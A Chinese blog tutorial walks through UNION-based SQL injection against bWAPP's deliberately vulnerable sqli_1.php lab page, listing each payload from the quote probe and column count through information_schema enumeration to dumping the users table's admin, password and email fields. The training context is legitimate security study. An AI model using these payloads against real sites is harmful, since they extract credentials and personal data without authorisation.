SQL注入之bWAPP之sqli_1.php

时间：2018-03-28 17:28:11 阅读：252 评论：0 收藏：0 [点我收藏+]

1、测试有没有注入点，如果有是什么类型注入，首先在“title=1”后面加个单引号看结果，如下图：
技术分享图片

报错中含有"%"提示，所以可以确定是搜索型SQL注入。
2、输入“title=1%‘and‘%‘=‘”或“title=1%‘or‘%‘=‘”，都未报错，且“title=1%‘or‘%‘=‘”显示页面如下：
技术分享图片

接下来开始注入。
3、判断字段数：
输入“title=1%‘order by 7 --+”，页面返回正常；输入“title=1%‘order by 8 --+”，页面返回“Error: Unknown column ‘8‘ in ‘order clause‘”，说明字段数为7，如下图：
技术分享图片

这里的注释符要用“--”而不是“#”，至于原因我也不知道，如果有大牛看到，希望不吝赐教。
4、查询数据库名等信息：
先看下显示的位置，输入：“title=1%‘union select 1,2,3,4,5,6,7 --+”，如下图：
技术分享图片

接着输入“title=1%‘union select 1,database(),version(),4,user(),6,7 --+”查看数据库名，数据库版本，当前数据库用户，如下图：
技术分享图片

5、查询表名：
输入“title=1%‘union select 1,database(),version(),table_name,user(),6,7 from information_schema.tables where table_schema=‘bwapp‘ --+”，结果如图：
技术分享图片

很明显我们要查看users表。
6、查询字段名：
输入“title=1%‘union select 1,database(),version(),column_name,user(),6,7 from information_schema.columns where table_name=‘users‘ --+”，结果如下图：
技术分享图片

users表中的字段计较多，我们重点关注admin、password、email三个字段。
7、查询字段内容：
输入“title=1%‘union select 1,database(),version(),group_concat(admin,"||",password,"||",email),user(),6,7 from users --+”，结果如下图：
技术分享图片

就以上这些步骤了，有兴趣的可以自己尝试其他表和其他字段。

SQL注入之bWAPP之sqli_1.php

标签：bWAPP之sqli_1.php

原文地址：http://blog.51cto.com/13577444/2092072

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行